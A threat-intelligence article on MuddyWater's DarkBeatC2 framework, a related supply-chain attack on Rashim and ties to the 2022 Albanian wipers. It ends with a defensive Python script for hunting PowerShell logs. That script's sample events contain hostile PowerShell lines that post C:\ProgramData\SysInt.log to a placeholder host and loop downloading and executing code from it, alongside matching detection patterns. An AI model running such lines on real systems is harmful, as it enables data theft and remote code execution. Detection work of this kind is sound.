DarkBeatC2

Iranian cyber actors appear to be coordinating their operations: a supply-chain attack that reused data from an earlier breach overlapped in time with a MuddyWater campaign built on a new C2 framework, DarkBeatC2.

Public reporting on Iranian attacks against Israel is short on technical detail.

Most incident response is handled by local companies and the INCD (Israel National Cyber Directorate), while technical details tend to come from external firms such as Google; even INCD alerts are vague, listing IOCs without context, which gives defenders little to act on.

The leaked Yara rules, though short on specifics, point to a connection with wipers used in Iranian cyberattacks: the rules target a range of systems and match the known wiper deployments by KarMa (linked to DEV-0842/BanishedKitten) against Albanian government institutions in 2022.


DEV-0842 was the group that deployed the ransomware and wipers in that attack, and Microsoft assessed with high confidence that Iranian actors were behind the operation as a whole, which suggests that the Iranian Ministry of Intelligence and Security (MOIS) coordinated a multi-group operation.

Threat actors behind the attack against the Albanian government in 2022

Mandiant found that the 2022 Albanian government attack used the FoxShell webshell, a variant associated with ScarredManticore (DEV-0861/ShroudedSnooper). The IOCs shared by INCD consisted of 3 domains, 7 file hashes and 31 IP addresses.

One of the domains had been used by DEV-1084 (DarkBit), working with MERCURY (MuddyWater), in the Technion attack, and 11 of the IP addresses were linked to past MuddyWater campaigns.

The researchers assessed that the remaining IP addresses hosted MuddyWater's latest tools and its C2 framework, "DarkBeatC2".

In a separate supply chain attack, a group calling itself "Lord Nemesis" compromised Rashim, an IT provider.

Through Rashim's access, the attacker obtained administrative access to the systems of Rashim's customers, maintained that access for months, exfiltrated data, and could potentially have reached the customers' networks through the Michlol CRM VPN. The case highlights why vendors must manage the credentials they hold for customer systems securely.

Updated MuddyWater campaign overview

MuddyWater, a threat actor known for changing its tactics only minimally, was observed using compromised Israeli email accounts to distribute links to archives containing remote access tools.

Uploader information at kinneretacil.egnyte[.]com

The links pointed to legitimate cloud storage services such as Egnyte, with subdomains that potentially spoof Israeli organizations, whereas archives hosted on other platforms carried Hebrew filenames, suggesting that the education sector was being targeted.

Uploader information at salary.egnyte[.]com

This activity, and the fact that its timeframe coincides with another attack on Israeli targets, raises the suspicion that Iranian government groups are collaborating to maximize damage.

Deep Instinct found a new MuddyWater C2 framework, which it named DarkBeatC2; it runs on IP addresses previously linked to MuddyWater campaigns and uses PowerShell for its communication.

PowerShell code from “setting” URI.

Infected machines can be connected to DarkBeatC2 in several ways: an operator running PowerShell code manually, code embedded in spear-phishing emails, or sideloaded malicious DLLs.

Analysis of the communication between infected machines and DarkBeatC2 shows that the framework retrieves and executes additional PowerShell scripts.

One script reads a file named "C:\ProgramData\SysInt.log" and sends its contents to the C2 server; another runs in a loop, fetching content from the C2 server that may contain instructions for the infected machine.
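The two behaviours just described are what a defender can hunt for in PowerShell script-block logs (Event ID 4104). The Python below is an added example, not code from Deep Instinct's report or from any MuddyWater sample: it scans a few constructed log events for a script that reads SysInt.log and posts it out, and for a download-and-execute loop, then pivots the hits on the contacted C2 host, the same kind of infrastructure pivot the researchers used to tie DarkBeatC2 to earlier MuddyWater IPs. The hostnames, script bodies and the RFC 5737 address 192.0.2.10 are made up for the example; only the SysInt.log path and the "setting" URI name come from the report.

```python
"""Example detection over PowerShell script-block log events for the two
DarkBeatC2 behaviours described in the report. Added example code, not
Deep Instinct's tooling or any MuddyWater sample."""
import re
from collections import defaultdict

# Constructed sample events shaped like Windows PowerShell script-block
# logging (Event ID 4104). Hostnames, script bodies and the RFC 5737 address
# 192.0.2.10 are made up for this example; only the SysInt.log path and the
# "setting" URI name come from the report.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws-01",
     "script": "Get-Date; Get-ChildItem C:\\Users\\Public"},
    {"id": 2, "host": "ws-01",
     "script": "$d = Get-Content 'C:\\ProgramData\\SysInt.log' -Raw; "
               "Invoke-WebRequest -Uri 'http://192.0.2.10/send' "
               "-Method POST -Body $d"},
    {"id": 3, "host": "ws-02",
     "script": "while ($true) { $r = (New-Object Net.WebClient)."
               "DownloadString('http://192.0.2.10/setting'); "
               "iex $r; Start-Sleep -Seconds 60 }"},
    {"id": 4, "host": "ws-03",
     "script": "Invoke-WebRequest -Uri 'https://updates.example.com/pkg.zip' "
               "-OutFile pkg.zip"},
]

# The staged-collection file the report names.
SYSINT_LOG_RE = re.compile(r"C:\\ProgramData\\SysInt\.log", re.IGNORECASE)
# Ways PowerShell sends a request body out (.NET upload methods or a POST).
UPLOAD_RE = re.compile(
    r"(UploadString|UploadData|UploadFile|-Method\s+POST|-Body\b)", re.IGNORECASE)
# Ways PowerShell pulls content from a URL.
DOWNLOAD_RE = re.compile(
    r"(DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b)",
    re.IGNORECASE)
# Execution of downloaded text.
EXEC_RE = re.compile(r"\b(iex|Invoke-Expression)\b", re.IGNORECASE)
LOOP_RE = re.compile(r"\b(while|for|foreach|do)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://([^/'\"\s]+)(/[^'\"\s)]*)?", re.IGNORECASE)


def classify(script):
    """Return the behaviour tags a single script body triggers."""
    tags = []
    # Behaviour 1: read SysInt.log and post it to the C2.
    if SYSINT_LOG_RE.search(script) and UPLOAD_RE.search(script):
        tags.append("sysint_log_exfil")
    # Behaviour 2: loop that downloads from the C2 and executes the result.
    if LOOP_RE.search(script) and DOWNLOAD_RE.search(script) and EXEC_RE.search(script):
        tags.append("polling_exec_loop")
    return tags


def extract_urls(script):
    """Return (host, path) pairs for every URL in the script body."""
    return [(m.group(1), m.group(2) or "/") for m in URL_RE.finditer(script)]


def scan(events):
    """Run classify() over events and keep only those that trigger a tag."""
    findings = []
    for ev in events:
        tags = classify(ev["script"])
        if tags:
            findings.append({"id": ev["id"], "host": ev["host"], "tags": tags,
                             "urls": extract_urls(ev["script"])})
    return findings


def pivot_c2(findings):
    """Group infected hosts by the C2 host they contacted: the same kind of
    infrastructure pivot that tied DarkBeatC2 to earlier MuddyWater IPs."""
    by_c2 = defaultdict(set)
    for f in findings:
        for host, _path in f["urls"]:
            by_c2[host].add(f["host"])
    return dict(by_c2)


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"event {f['id']} on {f['host']}: {', '.join(f['tags'])} -> {f['urls']}")
    print("C2 pivot:", pivot_c2(hits))
```

The patterns are deliberately loose starting points: in real telemetry, feed the ScriptBlockText field of Event 4104 into scan(), and expect operators to hide the same logic behind -EncodedCommand or string concatenation, so decode encoded command lines before matching and treat the pivot on contacted hosts, not the regexes, as the durable signal.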

MuddyWater has a history of using open-source tools and remote administration tools in its attacks; the IP addresses associated with these tools are also linked to other malicious activity.
